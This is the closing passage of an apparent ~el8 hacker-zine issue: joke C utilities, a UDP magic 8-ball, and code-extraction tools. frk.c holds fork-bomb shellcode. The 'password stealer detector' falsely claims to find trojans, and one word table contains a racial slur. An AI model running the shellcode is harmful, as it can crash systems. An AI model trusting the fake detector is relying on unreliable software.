[CUT_HERE] frk.c
#include <stdio.h>
/*
* ~el8 shellcode !!!!!!!
*
*/
unsigned char shellcode[] =
{
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx */
0x41, /* incl %ecx */
0x31, 0xc0, /* xorl %eax,%eax */
0xb0, 0x02, /* movb $0x2,%al */
0xcd, 0x80, /* int $0x80 */
0xb0, 0x25, /* movb $0x25,%al */
0x31, 0xdb, /* xorl %ebx,%ebx */
0x89, 0xd9, /* movl %ebx,%ecx */
0xb1, 0x11, /* movb $0x11,%cl */
0xcd, 0x80, /* int $0x80 */
0xe2, 0xee, /* loop 4 */
0x55, /* pushl %ebp */
0x89, 0xe5, /* movl %esp,%ebp */
0x53, /* pushl %ebx */
0x31, 0xc0, /* xorl %eax,%eax */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx */
0x41, /* incl %ecx */
0xb0, 0xa2, /* movb $0xa2,%al */
0x89, 0x4d, 0xf0, /* movl %ecx,0xfffffff0(%ebp) */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x89, 0x4d, 0xf4, /* movl %ecx,0xfffffff4(%ebp) */
0x89, 0x4d, 0xf8, /* movl %ecx,0xfffffff8(%ebp) */
0x89, 0x4d, 0xfc, /* movl %ecx,0xfffffffc(%ebp) */
0x8d, 0x5d, 0xf0, /* leal 0xfffffff0(%ebp),%ebx */
0x8d, 0x4d, 0xf8, /* leal 0xfffffff8(%ebp),%ecx */
0xcd, 0x80, /* int $0x80 */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx */
0x89, 0xcb, /* movl %ecx,%ebx */
0x89, 0xc8, /* movl %ecx,%eax */
0xcd, 0x80, /* int $0x80 */
0x00
};
unsigned char smallcode[] =
/* a _much_ smaller version (no exit().. or exit for that matter :-) */
{
0x31, 0xC0, /* xorl %eax, %eax */
0xB0, 0x02, /* movb $2,%al */
0xCD, 0x80, /* int $0x80 */
0xEB, 0xF8, /* jmp baq_and_touch_yourself */
0x00 /* add a null byte for flavor */
};
int main(void *a,void **b)
{
printf("1(%i,%Zi 0x%Zx)\n",strlen(shellcode),sizeof(shellcode),sizeof(s
hellcode));
printf("2(%i,%Zi 0x%Zx)\n",strlen(smallcode),sizeof(smallcode),sizeof(s
mallcode));
return (0);
}
[END_CUT] frk.c
[END_DIR] disturb
____________________________________
.-' `-.
[21]| w4r3z t4lk3r us1ng AI |[21]
[21]| by: |[21]
[21]| HubERT |[21]
`-.____________________________________.-'
This w4r3z t4lk3r is the first that ever uses AI to transform
the w4r3z sp33k. enj0y it.
[BEGIN_DIR] misc
[CUT_HERE] haqAI.c
#include <stdio.h>
#include <termios.h>
char toleet(char ch)
{
char ich = (ch|32);
if (ich == 'a')
return (1 == (rand() % 3)) ? '4' : ch;
else if (ich == 'b')
return (1 == (rand() % 3)) ? (1 == (rand() % 4)) ? '8' : '6' : ch;
else if (ich == 'c')
return (1 == (rand() % 5)) ? (1 == (rand() % 2)) ? '(' : '<' : ch;
else if (ich == 'd')
return ch;
else if (ich == 'e')
return (1 == (rand() % 2)) ? '3' : ch;
else if (ich == 'f')
return ch;
else if (ich == 'g')
return (1 == (rand() % 6)) ? '9' : ch;
else if (ich == 'h')
return ch;
else if (ich == 'i')
return (1 == (rand() % 2)) ? (!(rand() % 2)) ? '|' : '1' : ch;
else if (ich == 'j')
return ch;
else if (ich == 'k')
return ch;
else if (ich == 'l')
return (1 == (rand() % 7)) ? '|' : ch;
else if (ich == 'm')
return ch;
else if (ich == 'n')
return ch;
else if (ich == 'o')
return (1 == (rand() % 2)) ? (!(rand() % 2)) ? '@' : '0' : ch;
else if (ich == 'p')
return ch;
else if (ich == 'q')
return ch;
else if (ich == 'r')
return ch;
else if (ich == 's')
return (1 == (rand() % 2)) ? (!(rand() % 2)) ? '5' : '$' : ch;
else if (ich == 't')
return (!(rand() % 4)) ? '7' : ch;
else if (ich == 'u')
return ch;
else if (ich == 'v')
return ch;
else if (ich == 'w')
return ch;
else if (ich == 'x')
return ch;
else if (ich == 'y')
return ch;
else if (ich == 'z')
return (!(rand() % 10)) ? '2' : ch;
else
return ch;
return -1;
}
int main()
{
struct termios fu, ck;
char ch;
srand(time(0));
tcgetattr(0, &ck);
fu = ck;
ck.c_lflag &= ~(ECHO | ICANON);
tcsetattr(0, TCSANOW, &ck);
while ((ch = getchar()) != EOF) {
if (ch == 127) {
putchar("\b \b"[0]);
putchar("\b \b"[1]);
putchar("\b \b"[2]);
continue;
}
putchar(toleet(ch));
}
tcsetattr(0, TCSANOW, &fu);
}
[END_CUT] haqAI.c
[END_DIR] misc
____________________________________
.-' `-.
[22]| me.c |[22]
[22]| by: |[22]
[22]| tRODo |[22]
`-.____________________________________.-'
[BEGIN_DIR] misc
[CUT_HERE] me.c
#include <stdio.h>
#include <pwd.h>
#include <sys/types.h>
int main(int argc, char *(*(argv)))
{
struct passwd *juser;
if ((juser = getpwuid(getuid())) == NULL) {
perror("getpwuid()");
exit(-1);
}
printf("\033[2m\xf0 \033[1m%s \033[0;36m",juser->pw_name);
while(*++argv) {
printf("%s ",*argv);
}
puts("\033[m");
}
[END_CUT] me.c
[END_DIR] misc
____________________________________
.-' `-.
[23]| un1x p4ssw0rd ste4l3r det3kt0r |[23]
[23]| by: |[23]
[23]| securityfocus.com |[23]
`-.____________________________________.-'
This tool is very useful. It was first written by securityfocus
for AOL. We have now ported it to UNIX. It is best to run it from
your rc scripts, or on a cron minutely of the entire file system.
This will locate any password stealing trojan on your operating
system.
Yours Truly, Aleph1
[BEGIN_DIR] securityfocus
[CUT_HERE] pwsdetector.c
#include <stdio.h>
#include <sys/stat.h>
#include <ctype.h>
int is_pws(const char *tmp)
{
int w = 1;
while (*tmp) {
switch(w) {
case 1:
if (*tmp == '@') {
w = 2;
}
break;
case 2:
if (*tmp == '.') {
w = 3;
}
break;
case 3:
if (*tmp == ' ') {
w = 1;
}
else w = 4;
break;
case 4:
if (isalpha(*tmp)) {
return 1;
} else w = 1;
break;
default:
break;
}
tmp++;
}
return 0;
}
int main(int argc, char **argv)
{
FILE *fp;
struct stat st;
char buf[255];
char pws = 0;
while (1) {
argv++;
argc--;
if (!*argv) {
break;
}
if (stat(*argv, &st) == -1) {
perror(*argv);
exit(-1);
}
if (st.st_mode & S_IFDIR) {
continue;
}
if ((fp = fopen(*argv, "r")) == NULL) {
perror(*argv);
exit(-1);
}
memset(&buf,0,sizeof(buf));
while (!feof(fp)) {
memset(&buf,0,sizeof(buf));
fgets(buf,sizeof(buf),fp);
if (is_pws(buf)) {
pws = 1;
break;
}
}
if (pws == 1) {
printf("%s: passwd stealer detected.\n", *argv);
} else {
printf("%s: file is safe!\n", *argv);
}
pws = 0;
fclose(fp);
}
return 0;
}
[END_CUT] pwsdetector.c
[END_DIR] securityfocus
____________________________________
.-' `-.
[24]| leet_talker.c |[24]
[24]| by: |[24]
[24]| ~el8 pete |[24]
`-.____________________________________.-'
[BEGIN_DIR] misc
[CUT_HERE] leet_talker.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct letterpeople
{
char a;
char b;
};
struct wordz
{
char *a;
char *b;
};
struct letterpeople leterz[] = {
{'a', '4'},
{'e', '3'},
{'i', '1'},
{'o', '0'},
{'s', '5'},
{'A', '4'},
{'O', '0'},
{0, 0}
};
struct wordz w0rdz[] = {
{"with", "w/"},
{"without", "w/o"},
{"fuck", "fuq"},
{"fucking", "fuqn"},
{"shit", "shyt"},
{"looser", "nigr"},
{0, 0}
};
int
leet (char *str, int type)
{
int x, y, nword = 1, z = 0, j = 0;
if (type == 1)
{
/* lame elite leet talker */
for (x = 0; x < strlen (str); x++)
{
if (str[x] == ' ')
{
nword = 1;
continue;
}
if (str[x] == 'u')
{
if (!z)
{
if (!nword)
{
str[x] = 'U';
z += 1;
continue;
}
}
else
z += 1;
}
if (z == 5)
z = 0; /* leniant */
if ((str[x] == 's' || str[x] == 'S')
&& (!isalpha (str[x + 1]) || str[x + 1] == '\0'))
{
if (!j)
{
if (!nword)
{
str[x] = 'z';
j += 1;
continue;
}
}
else
j += 1;
}
if (j == 2)
j = 0;
for (y = 0; y < sizeof (leterz); y++)
{
if (str[x] == leterz[y].a)
{
if (isdigit (str[x - 1]) || isdigit (str[x + 1]))
break;
if (nword)
break;
if (str[x + 1] == ' ')
break;
if (!isalpha (str[x - 1]) || !isalpha (str[x + 1]))
break;
if (x == strlen (str) - 2)
break;
if (isupper (str[x - 1]) && islower (str[x + 1]))
break;
if (str[x] == 'e' || str[x] == 'E')
{
if (str[x + 1] == 'e' || str[x + 1] == 'E')
{
str[x + 1] = '4';
x += 1;
break;
}
}
str[x] = leterz[y].b;
}
}
nword = 0;
}
printf ("%s", str);
}
return 1;
}
int
warez_talker (char *str, int type)
{
int x, y = 0, z;
if (type == 1)
{
/* lame elite warez talker */
for (x = 0; x < strlen (str); x++)
{
if (y == 0)
{ /* make upper */
str[x] = toupper (str[x]);
y += 1;
}
else
{
/* make lower */
str[x] = tolower (str[x]);
y = 0;
}
}
printf ("%s", str);
}
return 1;
}
int
main (int argc, char *argv[])
{
char buff[255];
while (31337)
{
bzero (&buff, sizeof (buff));
if (fgets (buff, (sizeof (buff) - 1), stdin) == NULL)
break;
leet (buff, 1); /* leet */
leet (buff, 2); /* more leet */
warez_talker (buff, 1); /* leet */
}
return 0x7a69;
}
[END_CUT] leet_talker.c
[END_DIR] misc
____________________________________
.-' `-.
[25]| 8ball |[25]
[25]| by: |[25]
[25]| FUNNY_BUNNY |[25]
`-.____________________________________.-'
[BEGIN_DIR] 8ball
[CUT_HERE] Makefile
# Makefile for Magic 8-ball
CC=gcc
CFLAGS=
#CFLAGS=-O2 -Wall -pedantic -ansi
#CFLAGS=-DDEBUG
#LINKME=-lnsl -lsocket
LINKME=-lncurses
OBJS=main.o magic.o client.o server.o
TARGET=eball
all: eball
eball: $(OBJS)
$(CC) $(CFLAGS) -o $(TARGET) $(OBJS) $(LINKME)
.c.o:
$(CC) $(CFLAGS) -c $<
install: all
install -s -m 7755 $(TARGET) /usr/local/bin
clean:
rm -f core *.o
clear:
rm -f *.{c,h}~ Makefile~
[END_CUT] Makefile
[CUT_HERE] client.c
#include "eball.h"
#ifdef __linux__
#include <linux/kd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#endif
#include <curses.h>
int
doleds(void);
int
print_magic(const char *MAGIC);
extern int ball_client(char *host, short port, int magic_bean)
{
int sockfd;
socklen_t addrlen;
struct sockaddr_in me,you;
struct hostent *he;
char beener[MAX_MAGIC];
char data[MAX_MAGIC];
if ((he=gethostbyname(host))==NULL)
{
herror(host);
exit(-1);
}
if ((sockfd=socket(AF_INET,SOCK_DGRAM,0))< 0)
{
perror("udp socket call");
exit(-1);
}
bzero((char*)&me, sizeof(me));
me.sin_family = AF_INET;
me.sin_addr.s_addr = htonl(INADDR_ANY);
if ((bind(sockfd,(struct sockaddr*)&me,sizeof(me))<0))
{
perror("binding udp socket");
exit(-1);
}
bzero((char*)&data,sizeof(data));
bzero((char*)&you,sizeof(you)); // sometimes sizeof(you) will return NULL,
// this is normal :P
you.sin_family = AF_INET;
you.sin_addr = *((struct in_addr*)he->h_addr);
you.sin_port = htons(port);
doleds();
addrlen=(socklen_t)sizeof(you);
snprintf(beener,sizeof(beener),"%i",magic_bean);
if ((sendto(sockfd,beener,sizeof(beener),0,
(struct sockaddr*)&you,(socklen_t)sizeof(you)))<0)
{
perror("sending magic bean");
exit(-1);
}
if ((recvfrom(sockfd,data,sizeof(data)-1,0,
(struct sockaddr*)&you,&addrlen))<0)
{
perror("recv'ing magic message");
exit(-1);
}
print_magic(data);
shutdown(sockfd,2);
}
void
sigoose(int s){endwin();exit(1);}
int
print_magic(const char *MAGIC)
{
WINDOW *ball;
signal(SIGINT,sigoose);
initscr();
ball = subwin(stdscr,5,60,10,10);
noecho();
intrflush(ball,TRUE);
curs_set(FALSE);
box(ball,ACS_VLINE,ACS_HLINE);
touchwin(ball);
wrefresh(ball);
move(1,1);
mvwaddstr(ball,1,2,"And the answer is...");
wattrset(ball,A_STANDOUT);
mvwaddstr(ball,2,((int)((60-strlen(MAGIC))/2)),MAGIC);
wrefresh(ball);
sleep(3);
wclear(ball);
endwin();
return 0;
}
int
doleds(void)
{
int Ent,cons;
if (getuid()!=0||geteuid()!=0)
return 0; // silly kiddie, trix are for r00t!
#ifndef __linux__
printf("not linux\n");
sleep(1);
return 0;
}
#else
if((cons=open("/dev/console", O_RDWR | O_NOCTTY)) < 0)
{
perror("open(console)");
exit(-1);
}
fprintf(stderr,"Now using your LED's to generate some magic!\n");
for(Ent=0;Ent<65;Ent++,usleep(1000*Ent))
ioctl(cons,KDSETLED,1+(rand()%5));
close(cons);
ioctl(cons,KDSETLED,0x0);
return 0;
}
#endif
[END_CUT] client.c
[CUT_HERE] eball.h
/* magic 8-ball server / client */
/* by fB [funny bunny] - catch me in #hack.jp any server */
/* el8@press.co.jp subject: fB rulz */
/* Parts (c) Magic 8-ball Co. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <getopt.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#define MAX_MAGIC 255
#define BALL_PORT 8888
#define BALL_LOG "./ball.log"
#define YES 1
#define NO 0
[END_CUT] eball.h
[CUT_HERE] magic.c
/* MAGIC STUFF */
#include "eball.h"
extern void init_magic(void)
{
/* this algorithm (c) Magic 8-ball Co. */
register int X,Y,Z;
#ifdef DEBUG
printf("%u - ",rand());
#endif
X=rand();
Y=rand();
Z=rand();
srand((int)time(NULL));
X=(int)rand()%10;
Y=(int)rand()%20;
Z=(int)rand()%30;
for(;X>0;X--)
{
Y=rand()%10;
Z=rand()%10;
}
for(;Y>0;Y--)
{
X=rand()%10;
Z=rand()%10;
}
for(;Z>0;Z--)
{
X=rand()%10;
Y=rand()%10;
}
#ifdef DEBUG
printf("%u = diff\n",rand());
#endif
}
int get_magic(char *question)
{
rand(); // ditch the first call
rand(); // second one is dirty
/* c'mon lucky three! */
return ((int) (rand()^(int)*question));
}
char *getmmsg(int spice,char *mmsg,char *b[],int bsize)
{
int bean;
srand(spice);
bean = rand()%bsize;
mmsg = b[bean];
return b[bean];
}
[END_CUT] magic.c
[CUT_HERE] main.c
#include "eball.h"
char *getmmsg(int,char*,char*[],int);
void init_magic(void);
int get_magic(char*);
int ball_serv(void);
int ball_client(char*,short,int);
extern char *optarg;
extern int optind;
// this usage (c) funny bunny
void usage(const char *argv0, const char *msg)
{
fprintf(stderr,"\033[2J\033[47;2m["
"\033[m"
"\033[41;27;1m error: %69s "
"\033[m"
"\033[47;2m]\033[m"
"\n\033[47;2m\033[m%78s\033[47;2m\033[m"
"\n"
"%s [-s] [server]\n"
"%s [-c hostname] <question> [client]\n"
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
"\n" // remove this if you dont getchar()
"\033[47;2m[\033[m"
"\033[42;27;1m"
" magic 8-ball %57sby fB "
"\033[m\033[47;2m]"
"\033[m"
,msg," ",argv0,argv0," ");
getchar();
return;
}
main (int argc,char **argv)
{
int isClient=-1;
char c;
char *hostname=NULL;
while((c=getopt(argc,argv,"sc:"))!=EOF)
{
switch(c)
{
case 's':
isClient=NO;
break;
case 'c':
isClient=YES;
hostname = optarg;
break;
default:
usage(argv[0],"invalid option");
exit(1);
}
}
if(isClient==YES && (hostname==(char*)NULL || optind>=argc))
{
usage(argv[0],"no question / hostname");
exit(1);
}
if(isClient==-1)
{
usage(argv[0],"must specify either client or server mode");
exit(1);
}
setvbuf(stdout,(char*)NULL,_IONBF,0);
//srand(isClient=YES?*hostname:time(NULL)^rand());
srand(rand()%(int)time(NULL));
init_magic();
if (isClient == YES)
{
printf("[%s: client mode]\n"
"%s %i\n"
"%u\n",argv[0],hostname,BALL_PORT,get_magic(argv[optind]));
ball_client(hostname,BALL_PORT,get_magic(argv[optind]));
}
else
{
printf("[%s: server mode]\n",argv[0]);
ball_serv();
}
return 0;
}
[END_CUT] main.c
[CUT_HERE] server.c
#include "eball.h"
int beancounter=10;
char *magic_dust[] =
{
" Outlook does not look good. ",
" Definetly No. ",
" Yes!! ",
" Nope. ",
" I'm sorry - no. ",
" HELL NO! ",
" uhh... no. ",
" FER SHER!!! ",
" like, as if! ",
" like, totally ",
};
FILE *stdlog = NULL;
int con=0;
void getsig(int);
extern int ball_serv(void)
{
int sockfd=0, magic_bean;
socklen_t addrlen;
struct sockaddr_in me,you;
char data[MAX_MAGIC];
char *magic_msg=(char*)malloc(((size_t)MAX_MAGIC*sizeof(char)));
time_t t1me;
if (NULL==(stdlog = fopen(BALL_LOG,"a+")))
{
perror(BALL_LOG);
exit(-1);
}
signal(SIGTERM,getsig);
signal(SIGQUIT,getsig);
signal(SIGINT,getsig);
if (fork() != 0) exit(0); setsid();
if ( (sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("udp socket");
exit(-1);
}
bzero((char*)&data,sizeof(data));
bzero((char*)&you,sizeof(you));
bzero((char*)&me,sizeof(me));
me.sin_family = AF_INET;
me.sin_addr.s_addr = htons(INADDR_ANY);
me.sin_port = htons(BALL_PORT);
you.sin_family = AF_INET;
you.sin_addr.s_addr = htons(INADDR_ANY);
addrlen=(socklen_t)sizeof(you);
if ((bind(sockfd,(struct sockaddr*)&me,sizeof(me)) <0))
{
perror("couldn't bind to udp port!");
exit(-1);
}
for(;;)
{
if (recvfrom(sockfd,data,sizeof(data)-1,0,
(struct sockaddr *) &you, &addrlen) > 0)
{
if ((sscanf(data,"%i",&magic_bean))==1)
{
con++;
#ifdef DEBUG
printf("data in\n");
#endif
t1me = time(NULL);
fprintf(stdlog,"%.24s: %s [%i]\n",ctime(&t1me),
inet_ntoa(you.sin_addr),
magic_bean);
magic_msg = getmmsg(magic_bean,magic_msg,magic_dust,beancounter
);
#ifdef DEBUG
printf("sending: [%.50s]\n",magic_msg);
#endif
if (sendto(sockfd,magic_msg,MAX_MAGIC,0,
(struct sockaddr *)&you,(socklen_t)sizeof(you))<0)
{
#ifdef DEBUG
perror("sending magic msg");
exit(-1);
#endif /* DEBUG */
}
}
}
//bzero(magic_msg,sizeof(magic_msg));
bzero((char*)&data,sizeof(data));
}
fflush(stdlog);
shutdown(sockfd,2);
fclose(stdlog);
}
/* standard server.getsig() */
void getsig(int s)
{
fprintf(stderr,"Caught signal %i, exiting...\n",s);
fprintf(stderr,"[%i connections]\n",con);
fflush(stdlog);
exit(-1);
}
[END_CUT] server.c
[END_DIR] 8ball
____________________________________
.-' `-.
[26]| ELDUMP and ELTAG |[26]
[26]| by: |[26]
[26]| ~el8 |[26]
`-.____________________________________.-'
[BEGIN_DIR] .
[CUT_HERE] eldump.c
/*
-+-+
cat <<'/*++--++*'> eldump.c # */
/**********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
* permission to use/rewrite/add : granted *
* permission to trojan/steal : denied *
* permission to use illegally : denied *
* permission to use on dev/urandom : denied *
**********************************************/
/*******************************************
* eldump.c for standard UNIX compilers *
* next version: *
* *
* +article extraction (ablility to *(E)*
* specify article number) *[~]*
* +code extract by article number *[E]*
* +GUI interface for file viewing *[L]*
* (most likely curses based) *[8]*
* +ability to update code/articles via *[`]*
* updates/correction posted *[9]*
* on ~el8 website *[9]*
* +much cooler/faster/stronger/portable *
* +Versions for DOS C/COBOL/Asm/Pascal *
*******************************************/
// Questions/Comments/Corrections @ el8@press.co.jp
// el8.n3.net
// packetstorm.securify.com/mag/~el8/
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
/**************************************
* next version of eldump will have *
* a lot more features, this is just *
* a basic code extraction version. *
* - team ~el8 *
* *
* #define ISH_START "[SOI] %s" *
* #define ARTICLE_START "[BOW] %s" *
* #define ARTICLE_END "[EOW]" *
* #define ISH_END "[EOI]" *
**************************************/
/* for verbosity */
#define VERBOSE 0x01
#define VERY 0x10
#define LOTS 0x20
/* char array sizes */
#define LINELEN 80
#define BUFLEN 255
/* Issue Tag Defines */
#define CODE_START "[CUT_HERE] %s"
#define CODE_START_ARGS 1
#define DIR_START "[BEGIN_DIR] %s"
#define DIR_START_ARGS 1
#define DIR_END "[END_DIR] %s"
#define DIR_END_ARGS 1
#define CODE_END "[END_CUT] %s"
#define CODE_END_ARGS 1
#define loop(n) for(;n;)
/* global vars */
FILE *TextFD;
char BaseDirectory[BUFLEN], buf[LINELEN],
CodeDir[BUFLEN + BUFLEN], tmp[LINELEN];
int verbose = 0, linez = 0, codez = 0, dirz = 0;
const char *license = \
"/***********************************************\n"
" * released under (E) licensing ... *\n"
" * (E) RULES AND REGULATIONS *\n"
" * permission to use/rewrite/add : granted *\n"
" * permission to trojan/steal : denied *\n"
" * permission to use illegally : denied *\n"
" * permission to use on /dev/urandom : denied *\n"
" ***********************************************/\n"
"/* contact el8@press.co.jp for full license */\n"
"/* code copyrighted by ~el8 -- don't infringe! */\n\n";
/**********************
* int article(char *);
* int issue(char *);
**********************/
/* function prototypes */
int code (char *);
int extr (char *);
int
main (int argc, char *argv[])
{
int NumberOfFiles; // For multiple files
getcwd (BaseDirectory, BUFLEN); // error checking is for pussiez
setvbuf (stderr, (char *) NULL, _IONBF, 0);
if (argc < 2) // no options specified
{
fprintf (stderr,
"\033[0;36m"
".---------------------------------------.\n"
"|\033[1;36m /\\/| _ ___ _ \033[0;36m |\n"
"|\033[1;36m |/\\/ ___| |( _ ) _____ _| |_ _ __ \033[0;36m|\n"
"|\033[1;36m / _ \\ |/ _ \\ / _ \\ \\/ / __| '__| \033[0;36m|\n"
"|\033[1;36m | __/ | (_) || __/> <| |_| | \033[0;36m|\n"
"|\033[1;36m \\___|_|\\___/ \\___/_/\\_\\\\__|_| \033[0;36m|\n"
"`---usage-------------------------------'\n"
"\033[m\n"
"\033[7m %s [file1 file2 file3 ...] <option>\t\033[m\n"
"\033[0;32m\n"
".---options-----------------------------.\n"
"|+\033[1;32m [-v]: verbose \033[0;32m |\n"
"|+\033[1;32m [-vv]: very verbose\033[0;32m |\n"
"|+\033[1;32m [-vvv]: very very verbose \033[0;32m |\n"
"`---------------------------------------'\n"
"\033[m",
argv[0]);
exit (-1);
}
verbose -= verbose; // zero verbose
if (!strncmp (argv[argc - 1], "-v", 2)) // if the last option was a "-v"
{
verbose = VERBOSE;
argc--;
}
else if (!strncmp (argv[argc - 1], "-vv", 3)) // "-vv"
{
verbose = (VERY + VERBOSE);
argc--;
}
else if (!strncmp (argv[argc - 1], "-vvv", 4)) // "-vvv"
{
verbose = (LOTS + VERBOSE + LOTS);
argc--;
}
if (argc < 2)
{
fprintf (stderr, "need files...\n");
exit (-1);
}
for (NumberOfFiles = 1; NumberOfFiles < argc; NumberOfFiles++)
{
if (verbose >= LOTS)
{
fprintf (stderr, "eldumping code from %s\n", argv[NumberOfFiles]);
if (extr (argv[NumberOfFiles]) == 0)
{
fprintf (stderr, "[#%i] code eldump of %s: success!\n",
NumberOfFiles, argv[NumberOfFiles]);
}
else
{
fprintf (stderr, "[#%i] code eldump of %s: failed.\n",
NumberOfFiles, argv[NumberOfFiles]);
}
}
else
{
extr (argv[NumberOfFiles]);
}
}
if (verbose >= VERBOSE)
{
fprintf (stderr, "\t%i texts\n\t%i dirs\n\t%i codes\n\t\%i lines\n",
NumberOfFiles - 1, dirz, codez, linez);
}
exit (0);
}
int
extr (char *TextFileName)
{
char arg[LINELEN];
if ((TextFD = fopen (TextFileName, "r")) == NULL)
{
fprintf (stderr, "opening text %s: %s\n", TextFileName,
strerror (errno))
; return (-1);
}
loop (!feof (TextFD))
{
fgets (buf, LINELEN, TextFD);
if (sscanf (buf, DIR_START, arg) == DIR_START_ARGS)
{
snprintf (CodeDir, sizeof CodeDir, "%s/%s", BaseDirectory, arg);
if (verbose >= VERBOSE)
{
fprintf (stderr, "creating %s/\n", CodeDir);
dirz++;
}
if ((mkdir (CodeDir, 0700) == -1) && (errno != EEXIST))
{
perror (CodeDir);
fclose (TextFD);
return (-1);
}
if (chdir (CodeDir) == -1)
{
fprintf (stderr, "changing to code dir %s: %s\n", CodeDir,
strerror(errno));
fclose (TextFD);
return (-1);
}
else if (verbose >= LOTS)
fprintf (stderr, "changing to %s\n", CodeDir);
}
else if (sscanf (buf, CODE_START, arg) == CODE_START_ARGS)
{
if (verbose >= VERY)
fprintf (stderr, "eldumping %s\n", arg);
if (code (arg) == -1)
{
fclose (TextFD);
return (-1);
}
}
else if (sscanf (buf, DIR_END, tmp) == DIR_END_ARGS)
{
if (verbose >= LOTS)
fprintf (stderr, "changing to ..\n");
chdir ((!strcmp (arg, ".")) ? "." : "..");
}
}
fclose (TextFD);
return (0);
}
int
code (char *CodeFileName)
{
FILE *CodeFile;
char codebuff[BUFLEN];
chdir ((CodeDir != NULL) ? CodeDir : ".");
if ((CodeFile = fopen (CodeFileName, "w+")) == NULL)
{
fprintf (stderr, "opening code %s: %s\n", CodeFileName, strerror (errno))
; return (-1);
}
if (verbose >= VERBOSE)
codez++;
if (CodeFileName[strlen(CodeFileName)-1] == 'c'
&& CodeFileName[strlen(CodeFileName)-2] == '.')
fputs (license, CodeFile);
loop (!feof (TextFD))
{
fgets (codebuff, LINELEN, TextFD);
if (sscanf (codebuff, CODE_END, tmp) == CODE_END_ARGS)
{
if (verbose >= LOTS)
fprintf (stderr, "end of %s\n", CodeFileName);
fclose (CodeFile);
break;
}
else
{
fputs (codebuff, CodeFile);
if (verbose >= VERBOSE)
linez++;
}
}
return 0;
}
// [CUT_HERE] <NAME> then [END_CUT] <NAME> //
// [BEGIN_DIR] <NAME> then [END_DIR] <NAME> //
/*++--++*
cat <<'[EOI]'> /dev/null
*/
[END_CUT] eldump.c
[CUT_HERE] eltag.c
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#define loop(n) for(;n;)
char *TAG="[(%i) %s]";
char *TOCTAG="~el8|*iSSue2*[(%u) %s]*iSSue2|~el8";
extern char *optarg;
FILE *out;
void t4gz(char *,char*,int);
int
main (int argc, char *argv[])
{
int p;
char *file;
int type;
char *t4g = TAG;
if (argc < 3)
{
fprintf (stderr, "usage: %s <format> <-t> [-f infile] <-o outfile>\n"
"formats:\n"
"\t[-i]: integer output\n"
"\t[-X]: uppercase hexidecimal output\n"
"\t[-O]: octal output\n"
"\t[-x]: lowercase hexadecimal\n"
"[-t] = output table of contents\n",argv[0]);
exit (-1);
}
while ( (p = getopt(argc,argv,"tiXOxf:o:"))!=EOF){
switch(p){
case 't':
t4g = TOCTAG;
break;
case 'i':
type = p;
break;
case 'X':
type = p;
break;
case 'O':
type = p;
break;
case 'x':
type = p;
break;
case 'f':
file = optarg;
break;
case 'o':
if ((out=fopen(optarg,"w+"))==NULL)
{
perror(optarg);
exit (-1);
}
break;
default:
exit(-1);
}
}
if (out==NULL) out=stderr;
t4gz(file,t4g, type);
exit (0);
}
void
t4gz (char *T,char *tag,int io)
{
char articlename[80];
unsigned articleno=0;
int lineno;
FILE *TFD;
char buf[80];
if ((TFD = fopen (T, "r")) == NULL)
{
perror(T);
exit (-1);
}
bzero((char*)&buf,sizeof(buf));
lineno-=lineno;
loop (!feof (TFD))
{
lineno++;
fgets (buf, sizeof(buf), TFD);
if (sscanf(buf,tag,&articleno,articlename) == 2)
{
if (buf[strlen(buf)-1] == '\n') buf[strlen(buf)-1] = '\0';
switch (io) {
case 'i':
fprintf(stderr,"[(%04i) %20s]\t @ \033[1mLine %i\033[m\n",
articleno
,articlename,lineno);
break;
case 'X':
fprintf(stderr,"[(%4X) %20s]\t @ \033[1mLine %i\033[m\n",articleno,
articlename,lineno);
break;
case 'O':
fprintf(stderr,"[(%4o) %20s]\t @ \033[1mLine %i\033[m\n",articleno,
articlename,lineno);
break;
case 'x':
fprintf(stderr,"[(%4x) %20s]\t @ \033[1mLine %i\033[m\n",
articleno,
articlename,lineno);
break;
default:
fprintf(stderr,"[(%04i) %20s]\t @ \033[1mLine #%i\033[m\n",
articleno,
articlename,lineno);
break;
}
}
bzero((char*)&buf,sizeof(buf));
}
fclose (out);
fclose (TFD);
exit (0);
}
[END_CUT] eltag.c
____________________________________
.-' `-.
[27]| cl0s1ng |[27]
[27]| by: |[27]
[27]| ~el8 |[27]
`-.____________________________________.-'
em4il uz! m0re submissi0nz w0uld b gre4t! iph there'z n0t
much submissi0nz it'll b a ye4r again! we kn0w u d0nt w4nt
that!
[EOW]
[EOI]
echo '
lllllll 888888888
l:::::l 88:::::::::88
l:::::l 88:::::::::::::88
l:::::l 8::::::88888::::::8
eeeeeeeeeeee l::::l 8:::::8 8:::::8
ee::::::::::::ee l::::l 8:::::8 8:::::8
_________ _____ e::::::eeeee:::::ee l::::l 8:::::88888:::::8
/ \ / |e::::::e e:::::el::::l 8:::::::::::::8
/ ~el8 \/ /e:::::::eeeee::::::el::::l 8:::::88888:::::8
/ _ / e:::::::::::::::::e l::::l 8:::::8 8:::::8
/ / \ / e::::::eeeeeeeeeee l::::l 8:::::8 8:::::8
\_____/ \________/ e:::::::e l::::l 8:::::8 8:::::8
e::::::::e l::::::l8::::::88888::::::8
e::::::::eeeeeeee l::::::l 88:::::::::::::88
ee:::::::::::::e l::::::l 88:::::::::88
eeeeeeeeeeeeee llllllll 888888888
.g4yd4nb4n.
'
echo 'Extracted eldump.c'
echo 'use $CC eldump.c -o eldump'
echo './eldump ~el8[0] (-v | -vv | -vvv)'
echo
echo ' * ~el8 team 294 local 24 *'
echo ' * check local listings *'
